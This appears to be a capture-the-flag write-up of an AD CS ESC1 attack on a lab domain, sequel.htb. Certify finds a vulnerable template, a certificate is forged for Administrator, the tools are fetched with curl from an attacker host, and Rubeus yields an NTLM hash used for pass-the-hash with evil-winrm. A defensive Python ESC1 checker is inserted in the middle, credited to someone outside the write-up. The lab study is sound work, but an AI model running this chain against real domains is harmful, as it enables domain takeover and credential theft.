Certify
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
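As an added example from the defender's side (not part of this writeup), the following Python check takes the Certify find output above and reports which of the ESC1 preconditions a template meets: enrollee-supplied subject, no manager approval, zero authorized signatures, an authentication-capable EKU, and enrollment rights for a low-privileged group. Removing any one of them (for example clearing ENROLLEE_SUPPLIES_SUBJECT, or enabling CA certificate manager approval so PEND_ALL_REQUESTS is set) closes the path the rest of the writeup walks through; the sample input is constructed from the template block shown above.

```python
import re

# Well-known low-privileged principals (Authenticated Users, Everyone; RIDs Domain Users, Domain Computers).
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}
LOW_PRIV_RIDS = {"513", "515"}
# EKUs that allow the issued certificate to be used for domain logon (PKINIT).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}
KEYS = ("msPKI-Certificate-Name-Flag", "mspki-enrollment-flag",
        "Authorized Signatures Required", "pkiextendedkeyusage")

# Constructed sample: the template fields from the Certify output above, trimmed to what the check needs.
SAMPLE = r"""
    Template Name                         : UserAuthentication
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
        Enrollment Rights : sequel\Domain Admins  S-1-5-21-4078382237-1492182817-2568127209-512
                            sequel\Domain Users   S-1-5-21-4078382237-1492182817-2568127209-513
      Object Control Permissions
"""

def parse_templates(text):
    """Split Certify 'find' output into one dict of the relevant fields per template."""
    templates = []
    for block in re.split(r"(?m)^\s*Template Name\s*:", text)[1:]:
        name, _, body = block.partition("\n")
        fields = {"name": name.strip()}
        for key in KEYS:
            m = re.search(rf"(?im)^\s*{re.escape(key)}\s*:\s*(.*)$", body)
            fields[key] = m.group(1).strip() if m else ""
        # Enrollment rights run from 'Enrollment Rights' up to 'Object Control Permissions'.
        m = re.search(r"Enrollment Rights(.*?)Object Control Permissions", body, re.S)
        fields["enroll_sids"] = re.findall(r"S-1-[\d-]+", m.group(1)) if m else []
        templates.append(fields)
    return templates

def esc1_findings(fields):
    """ESC1 preconditions that hold for a template; all five together make it exploitable."""
    ekus = {e.strip() for e in fields["pkiextendedkeyusage"].split(",") if e.strip()}
    checks = {
        "enrollee supplies subject": "ENROLLEE_SUPPLIES_SUBJECT" in fields["msPKI-Certificate-Name-Flag"],
        "no manager approval": "PEND_ALL_REQUESTS" not in fields["mspki-enrollment-flag"],
        "no authorized signatures": fields["Authorized Signatures Required"] == "0",
        "authentication EKU (or none)": not ekus or bool(ekus & AUTH_EKUS),
        "low-privileged enrollment": any(s in LOW_PRIV_SIDS or s.rsplit("-", 1)[-1] in LOW_PRIV_RIDS
                                         for s in fields["enroll_sids"]),
    }
    return [name for name, hit in checks.items() if hit]
```

A template is reported as ESC1 only when all five findings are present; the same parser can be pointed at the full find output to review every template the CA publishes.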
The tool finds a vulnerable template. Following this guide, we can obtain the private key by passing it the details of the vulnerable template.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 10
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.8944694
We save the keys in two separate files, cert.pem and private.key, and generate the PFX with openssl.
❯ openssl pkcs12 -in cert.pem -inkey private.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
❯ ls
cert.pem cert.pfx private.key
We upload the PFX and the Rubeus tool, which will help us obtain the administrator's NTLM hash.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.14.34/cert.pfx -o cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.14.34/Rubeus.exe -o Rubeus.exe
We request the TGT with Rubeus using the PFX file, which also yields the administrator user's NTLM hash.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::41d3:4b1:9ebd:35e0%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 2/28/2023 2:36:46 PM
EndTime : 3/1/2023 12:36:46 AM
RenewTill : 3/7/2023 2:36:46 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : KpyfHsOzVkFNw3PGpIYBBg==
ASREP (key) : DE39E6FE183C7BE277EA8DECA4B1848C
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
evil-winrm -i 10.10.11.202 -u "administrator@sequel.htb" -H "A52F78E4C751E5F5E17E1E9F3E58F4EE"